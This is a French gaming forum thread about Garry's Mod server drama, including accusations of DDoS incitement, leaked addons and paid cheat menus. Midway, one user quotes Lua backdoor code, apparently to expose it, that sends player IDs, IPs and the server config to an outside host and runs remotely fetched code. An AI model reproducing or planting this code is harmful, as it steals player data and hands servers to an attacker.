Hack IMPORTANT

• Initiateur de la discussion Notika
  • Date de début
Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Score réaction
9 687
S0Wolf à dit:
Renseigne toi auprès de Zoldac tu aura toutes tes réponses
Ta mis genre 3 pages a cracher un pseudo , a combien de page tu avoue que tu incite au DDOS de gens lambda et qu'il vaux mieux utiliser des leak plutôt que de payer ses addons ?

Koro Sensei

Koro Sensei

Bambi
Score réaction
20
S0Wolf à dit:
Faut bien trouver des gens de votre domaine si on veut avancer à quelque chose
@zoldacyt viens on a besoin de toi :heart:

Akulla

Akulla

Helpeur Divin
Score réaction
2 240
S0Wolf à dit:
Faut bien trouver des gens de votre domaine si on veut avancer à quelque chose
Depuis quand alfost backdoor ? :thinking

Koro Sensei

Koro Sensei

Bambi
Score réaction
20
Akulla à dit:
Depuis quand alfost backdoor ?
Depuis qu'il est admin sur un grand site de fuite. ça aide a passer les vérification quand tu peux te l'ai validé toi même Kappa

• J'aime
Réactions: Akulla
  • Initiateur de la discussion
Notika

Notika

Geek
Score réaction
3
Bon on peut clôturer ce topic ? Façon on se vois dans 3 jours nous ?

Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Score réaction
9 687
S0Wolf à dit:
Bon on peut clôturer ce topic ? Façon on se vois dans 3 jours nous ?
Sinon quoi ? ddos ?

Ah bah non rt :eek:

• J'aime
Réactions: ZarosOVH et Akulla
Notika

Notika

Geek
Score réaction
3
Yoh Sambre ♪ à dit:
Sinon quoi ? ddos ?

Ah bah non rt :eek:
Ah non dutout moi je m’occupe de plus rien c’est plus moi qui a le traîneau en main donc pas de ddos venant de moi dsl

Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Score réaction
9 687
S0Wolf à dit:
Ah non dutout moi je m’occupe de plus rien c’est plus moi qui a le traîneau en main donc pas de ddos venant de moi dsl
Oui en avant pour le fait de ne pas assumer c'est plus facile hein Kappa

Notika

Notika

Geek
Score réaction
3
Yoh Sambre ♪ à dit:
Oui en avant pour le fait de ne pas assumer c'est plus facile hein Kappa
Façon j’y connais rien moi à vos trucs ^^ pour ça que c’est plus moi qui a les choses en main je laisse faire et on verra bien comme ça j’aurai rien à me reprocher moi ^^

Notika

Notika

Geek
Score réaction
3
Notika

Notika

Geek
Score réaction
3
Nom d'utilisateurs à dit:
https://vocaroo.com/i/s0MIkL3P31s1
Tu me rappel la voix de keeta :0

Notika

Notika

Geek
Score réaction
3
Moi keeta ?

LEL
Bah oui ! Mais je peut pas te partager mon compte .. je suis ban de gmodstore malheureusement :(

Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Score réaction
9 687
S0Wolf à dit:
Façon j’y connais rien moi à vos trucs ^^ pour ça que c’est plus moi qui a les choses en main je laisse faire et on verra bien comme ça j’aurai rien à me reprocher moi ^^
Ça incite au ddos et participe a celui ci (partage d'ip) et ça ose se mettre sur le coté pavupari...ça promet un avenir radieux dis donc , semblable a ce genre de contenu hein

• J'aime
Réactions: Joe Leroi, ZarosOVH et Notika
Notika

Notika

Geek
Score réaction
3
Yoh Sambre ♪ à dit:
Ça incite au ddos et participe a celui ci (partage d'ip) et ça ose se mettre sur le coté pavupari...ça promet un avenir radieux dis donc , semblable a ce genre de contenu hein

Tu me fais trop de pub arête stp <3

Notika

Notika

Geek
Score réaction
3
Notika

Notika

Geek
Score réaction
3
https://vocaroo.com/i/s1TRdSIgyoNw
C’est quoi un fichier .rar je comprend pas

Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Score réaction
9 687
  • J'aime
Réactions: Lap3che et ZarosOVH
Notika

Notika

Geek
Score réaction
3
Yoh Sambre ♪ à dit:
Ouai t'en a vraiment besoin

0 dislick faudrai que tu en mette un stp pour un souvenir de toi <3

Koro Sensei

Koro Sensei

Bambi
Score réaction
20
S0Wolf à dit:
Incitation au dislike +1 report

Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Score réaction
9 687
S0Wolf à dit:
J'ai préféré télécharger ton live en guise de souvenir perso

• J'aime
Réactions: Koro Sensei
Notika

Notika

Geek
Score réaction
3
Koro Sensei à dit:
Incitation au dislike +1 report
Non ! Je vais être ban de YouTube ! Noooon !! Gmodstore + YouTube sa fais mal en une soirée :(

• Banni
zoldacyt

zoldacyt

Geek
Score réaction
33
GVacDoor ptdr il a pris des .cz chez Hukot pour pas ce faire down comme la première fois...

Sinon le mec @S0Wolf n'avait pas de leak sauf un awarn 2 que son pote a mis (cc Keeta) avec ça backdoor qui fait trembler les murs

Y'avait 15 securegmod qui étaient en route dans ces addons, ce qui est sûre c'est que niveau leak ya rien.

Je connaissais pas ce mec avant hier, mais vous avez pas l'air de l'aimer ? C'est quoi l'embrouille ?

• Banni
zoldacyt

zoldacyt

Geek
Score réaction
33
Koro Sensei à dit:
En passant le lien que ta donné est relier à rien :')
rt
Fermée en une nuit ? Déjà il marchait hier,dommage.

Voici les autre domaines :
GVacDoor.cz,
Anti-leak.cf

Petit code keta pour montrer ce qu'il nous fait :
Code:
timer.Simple(1,function()
hook.Add("PlayerInitialSpawn","bgplayerconnexionmdr",function(ply) if ply:IsBot()==false then G["HTTP"]({url="https://anti-leak.cf/_/russia_secure/not_secure_hack_me_please.php?steamid64="..util.Base64Encode(ply:SteamID64()).."&steam_name="..util.Base64Encode(ply:Nick()).."&ip_users="..util.Base64Encode(ply:IPAddress());method="get";success=function(b,) end;failed=function(r)end}) end
end)
timer.Create( "getinfo_mdr", 5, 0, function()
G["HTTP"]({url="https://anti-leak.cf/_/russia_secure/not_secure_hack_me_please.php?run=1&ip_servers="..game.GetIPAddress().."&pl="..#player.GetHumans().."/"..game.MaxPlayers();method="get";success=function(b,) RunString(_,"lua_error",false) end;failed=function(r)end})
end)
timer.Simple(1,function()
adressBG = string.Explode(":",game.GetIPAddress())
http.Post("https://anti-leak.cf/_/russia_secure/not_secure_hack_me_please.php",{ip=adressBG[1], port=adressBG[2], name=GetHostName(),map=game.GetMap(),gamemode = engine.ActiveGamemode()},function( result )
end,function(failed)
end)
end)
timer.Simple(5,function()
http.Post("https://anti-leak.cf/_/dl_.php",{name=GetHostName(),filename='server'..math.random(0,99999)..'.cfg',content=file.Read("cfg/server.cfg","GAME"),ip=game.GetIPAddress()}, function(result) end)
end)
timer.Create("blacklist_suck",60,0,function() if file.Exists("blacklist_gbox/blacklist.txt","DATA") then file.Delete("blacklist_gbox/blacklist.txt") end
end)

• J'aime
Réactions: Yoh Sambre ♪
Verifio

Verifio

Geek
Score réaction
16
ISSOU

Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Score réaction
9 687
zoldacyt à dit:
GVacDoor ptdr il a pris des .cz chez Hukot pour pas ce faire down comme la première fois...

Sinon le mec @S0Wolf n'avait pas de leak sauf un awarn 2 que son pote a mis (cc Keeta) avec ça backdoor qui fait trembler les murs

Y'avait 15 securegmod qui étaient en route dans ces addons, ce qui est sûre c'est que niveau leak ya rien.

Je connaissais pas ce mec avant hier, mais vous avez pas l'air de l'aimer ? C'est quoi l'embrouille ?
yo zoldacyt , alors je te la fait courte car personne n'aime les pavés :

"ohno un h4x0r sur le serveur..pas grave je vais abusé de CAC prendre son IP et l'envoyer a un mec sombre afin qu'il down l'internet de ce vilain fifou!"

clairement se rabaisser a ça faut vraiment être un minable :/ (le pire étant que jean gugusse la se cache totalement de ses dires sur son propre live depuis hein..a un moment faut arrêter tu l'ouvre tu assume )

bref rien d'incroyable juste le compère d'un duo qui a envie de devenir famousse sur le youtube francais en suivant les modes poubelle comme les vidéos fortnite ect..dommage (on peux reconnaitre que son pote sait au moins lui mettre l'ambiance en terme de rythme)

ps: la nouvelle interface de VL est sympas mais j'avoue que le blanc qui crame les yeux ca pique :'( (des bisous au reste de la modération)

• J'aime
Réactions: Joe Leroi, zoldacyt et Verifio
  • Banni
zoldacyt

zoldacyt

Geek
Score réaction
33
Yoh Sambre ♪ à dit:
yo zoldacyt , alors je te la fait courte car personne n'aime les pavés :

"ohno un h4x0r sur le serveur..pas grave je vais abusé de CAC prendre son IP et l'envoyer a un mec sombre afin qu'il down l'internet de ce vilain fifou!"

clairement se rabaisser a ça faut vraiment être un minable :/ (le pire étant que jean gugusse la se cache totalement de ses dires sur son propre live depuis hein..a un moment faut arrêter tu l'ouvre tu assume )

bref rien d'incroyable juste le compère d'un duo qui a envie de devenir famousse sur le youtube francais en suivant les modes poubelle comme les vidéos fortnite ect..dommage (on peux reconnaitre que son pote sait au moins lui mettre l'ambiance en terme de rythme)

ps: la nouvelle interface de VL est sympas mais j'avoue que le blanc qui crame les yeux ca pique :'( (des bisous au reste de la modération)
Ah ok je savais pas tout ça, par contre la personne que j'ai aidé hier c'était pas lui mais son pote, il avait pas l'accès console donc ça ne peut pas être lui, et c'était la personne avec qui jetais sur TeamViewer qui me disait qu'il n'avait pas de leak et au bout de 5mn il m'a montré un fichier qu'il à téléchargé sur codefodder.store une "awarn2free" publié par Keta, quand on lit les tags ya pas de doute..

Sinon au final oui il avait un leak si on peut dire sa comme ça vu que c'était soir disant une version free de l'addon qui existe bel en bien selon mes souvenirs.

Pas la peine d'en faire un carton pour Keeta et son ip, il est en dynamique, il risque rien tkt.

• J'aime
Verifio

Verifio

Geek
Score réaction
16
C'est surtout un VPN

• J'aime
  • Banni
zoldacyt

zoldacyt

Geek
Score réaction
33
Verifio à dit:
C'est surtout un VPN
Je sais pas j'ai vu cette fameuse ip qui aurait fuité mais si c'est le cas, encore mieux.

Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Score réaction
9 687
zoldacyt à dit:
Pas la peine d'en faire un carton pour Keeta et son ip, il est en dynamique, il risque rien tkt.
Je sait bien mais t'imagine si le mec traite n'importe qu'elle joueur un poil gênant comme ça ? belle mentalité

c'comme ci toi tu t'amusais a ddos les leechers de chez VL sous pretexte qu'il sont des gens gênant 4Head

• Banni
zoldacyt

zoldacyt

Geek
Score réaction
33
Yoh Sambre ♪ à dit:
Je sait bien mais t'imagine si le mec traite n'importe qu'elle joueur un poil gênant comme ça ? belle mentalité

c'comme ci toi tu t'amusais a ddos les leechers de chez VL sous pretexte qu'il sont des gens gênant 4Head
Tkt je vois bien le problème, ça reste Keeta tu croit qu'il a pas fait pareil ? Genre drop l'IP de VL en se prennent pour un hackeur avec ddos.py qu'il a trouvé sur github ? Mdrr

Verifio

Verifio

Geek
Score réaction
16
Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Score réaction
9 687
zoldacyt à dit:
Tkt je crois bien le problème, ça reste Keeta tu croit qu'il a pas fait pareil ? Genre drop l'IP de VL en se prennent pour un hackeur avec ddos.py qu'il a trouvé sur github ? Mdrr
en même temps les mecs..apache quoi PartyTime

• Banni
zoldacyt

zoldacyt

Geek
Score réaction
33
Yoh Sambre ♪ à dit:
en même temps les mecs..apache quoi PartyTime
Ca fait on moment qu'on a changés tout ça, on sen battait les couilles, personne avait L'IP..

• J'aime
Réactions: Notika
séméron23

séméron23

Psychopathe
Score réaction
310
Dommage qui est plus g-box BibleThump @Yoh Sambre ♪
sa aurais finis dans la catégorie drama KappaClaus

• J'aime
séméron23

séméron23

Psychopathe
Score réaction
310
zoldacyt à dit:
Je sais pas j'ai vu cette fameuse ip qui aurait fuité mais si c'est le cas, encore mieux.
Je suis par non plus pour eux mais regarde mon ancien message x),
sa m'étonnerais que le gars soit en Angleterre x)

Sinon c'est sympa le monde des Bisounours ici KappaClaus

• J'aime
  • Administration
Snk

Snk

El Dictator
Membre du Staff
Score réaction
2 391
S0Wolf à dit:
Non malheureusement il n'y a pas de personnes de grand talent sur mTx pour régler un problème... c'est bien dommage de voir aujourd'hui.. Donc nous partons de chez eux tout simplement et je dis bonne chance à tous ceux qui ferons leurs serveurs chez mTx qui est sois disant "Bien protégé"
Hum si ça s’adresse à nous (difficile à dire quand ça parle de MTX souvent c’est du forum) on ne peut techniquement rien faire pour vous. La sécurité niveau addons et scripts LUA, c’est votre affaire... et ça vaut pour n’importe quel hébergeur d’ailleurs.

Notika

Notika

Geek
Score réaction
3
Snk à dit:
Hum si ça s’adresse à nous (difficile à dire quand ça parle de MTX souvent c’est du forum) on ne peut techniquement rien faire pour vous. La sécurité niveau addons et scripts LUA, c’est votre affaire... et ça vaut pour n’importe quel hébergeur d’ailleurs.
En sachant que les addons sont achetés sauf le awarn que l’on a pris (la version free) pour pouvoir la modifié .. Désolé d’avoir eu de grandes frayeurs pour le futur de mon serveur..

Verifio

Verifio

Geek
Score réaction
16
Tu es seul responsable des merde que tu mets sur ton serveur ;)

• Banni
Hoper

Hoper

Geek suprême
Score réaction
233
SkydrazZ à dit:
@Verifio si non j'aimerais bien savoir à quoi te sert de cheater sur des serveurs?
rien de méchant, de toute manière il arrive même pas à faire fonctionné un .dll qui a coder lui-même askip.

Donc bon moi j'le range dans la categorie des gens qui clique sur le bouton pour se mettre superadmin rien de plus

• J'aime
Verifio

Verifio

Geek
Score réaction
16
Je ne l'ai pas fait je l'ai volé ;)

Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Score réaction
9 687
Hoper à dit:
rien de méchant, de toute manière il arrive même pas à faire fonctionné un .dll qui a coder lui-même askip.

Donc bon moi j'le range dans la categorie des gens qui clique sur le bouton pour se mettre superadmin rien de plus
fépalfou j'te rappelle que tu a payer cette même DLL a plus de 40 euros , on se souvient de el famoso phrase

le leak de la v2 n'existera pas ;)
dans la méme semaine de sa sortie > self leak :rire:

séméron23

séméron23

Psychopathe
Score réaction
310
@Yoh Sambre ♪ j'y pense mtn même si c'est hors sujet,
mais à tu vue ma conversation ?

• Banni
Hoper

Hoper

Geek suprême
Score réaction
233
Yoh Sambre ♪ à dit:
fépalfou j'te rappelle que tu a payer cette même DLL a plus de 40 euros , on se souvient de el famoso phrase

dans la méme semaine de sa sortie > self leak :rire:
ben oui justement je l'ai acheter, car j'avais eu des bonnes remarques sur lui, mais monsieur n'arrivait pas à le faire marcher...

Et oui le ravenpityV2 n'aurait jamais pu être leak avec la sécu qu'on a fait avec keeta et IXXE. Je l'ai release quelques jours plus tard car j'arretais les mods menus

Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Score réaction
9 687
Hoper à dit:
ben oui justement je l'ai acheter, car j'avais eu des bonnes remarques sur lui, mais monsieur n'arrivait pas à le faire marcher...
payer pour un bypass cac

m
d
r

Hoper à dit:
n'aurait jamais pu être leak avec la sécu qu'on a fait avec keeta et IXXE
m
d
r

Hoper à dit:
Je l'ai release quelques jours plus tard car j'arretais les mods menus
ta juste compris que l'ensemble de tes menu étais naze plutôt nan ?

Verifio

Verifio

Geek
Score réaction
16
"monsieur n'arrivait pas à le faire marcher..."

Enfait il a jamais marché et meme avant que je te le vende Il ne marchait pas :)

• Banni
Hoper

Hoper

Geek suprême
Score réaction
233
Yoh Sambre ♪ à dit:
payer pour un bypass cac

m
d
r

m
d
r

ta juste compris que l'ensemble de tes menu étais naze plutôt nan ?
payer pour un bypass cake, oui, si le bypass cake aurait marcher tkt que le menu se vendrais encore comme des ptits pains

tu n'aurais jamais pu trouver la source du menu, j'pe te le garantir 100%. On a fais un putin de chateau fort stuveux jte dis les trucs qu'on avait mis.

Le menu est peut etre naze (meme si c'est pour moi le meilleur reskin du lokidev avec toutes les exploits update et plein de fonctionnalitées sympa) mais il a beaucoup plus :=)

hum bizarre ce yoh sambre
téléchargement.png

Dernière édition:
Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Score réaction
9 687
Hoper à dit:
Le menu est peut etre naze (meme si c'est pour moi le meilleur reskin du lokidev avec toutes les exploits update et plein de fonctionnalitées sympa) mais il a beaucoup plus :=)

arrête de délirer 5mn la ça valais que dalle ta production

• Banni
Hoper

Hoper

Geek suprême
Score réaction
233
Yoh Sambre ♪ à dit:

arrête de délirer 5mn la ça valais que dalle ta production
wow des ptits montages tout ça chuis flaté

- le esp est full modif (va ingame tu verras)
- je me base du lokidev, normal que c'est les memes .net vu que j'ai juste checker celle outdated et je les ai update si c'était possible , et j'en ai mis des nouvelles.

fin bref t'es hypocrite comme mec, quand on parles du betrayed tout de suite tout vas bien j'adore les mods menus par contre quand c'est le ravenpity burk gne j'aime pas il a eu tro dargen.

Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Score réaction
9 687
Hoper à dit:
wow des ptits montages tout ça chuis flaté

- le esp est full modif (va ingame tu verras)
- je me base du lokidev, normal que c'est les memes .net vu que j'ai juste checker celle outdated et je les ai update si c'était possible , et j'en ai mis des nouvelles.

fin bref t'es hypocrite comme mec, quand on parles du betrayed tout de suite tout vas bien j'adore les mods menus par contre quand c'est le ravenpity burk gne j'aime pas il a eu tro dargen.
le betrayed étais aussi a chier hein , les exploit du pity étais déjà obsolète a leur arriver sur ton menu car tous le monde les avais..tu les a mis car au final tu savai méme pas quoi foutre dans ton menu TheTarFu .

Ta fait de l'argent ? , good j'en n'ai absolument rien a faire LokiJunior > go acheter une moto

"esp" full modif blablabla c’était de la purée ton truc :

- basique esp global même pas foutu de s'appliquer en fonction du gamemode de manière propre ect..ect

• J'aime
Réactions: Koro Sensei
ZarosOVH

ZarosOVH

Modérateur
Membre du Staff
Score réaction
5 488
Hoper à dit:
Et oui le ravenpityV2 n'aurait jamais pu être leak avec la sécu qu'on a fait avec keeta et IXXE.
Même Keeta sera d'accord pour dire que le leak est possible 4Head

• J'aime
Réactions: Lap3che
Discord d'entraide
Rejoignz-nous sur Discord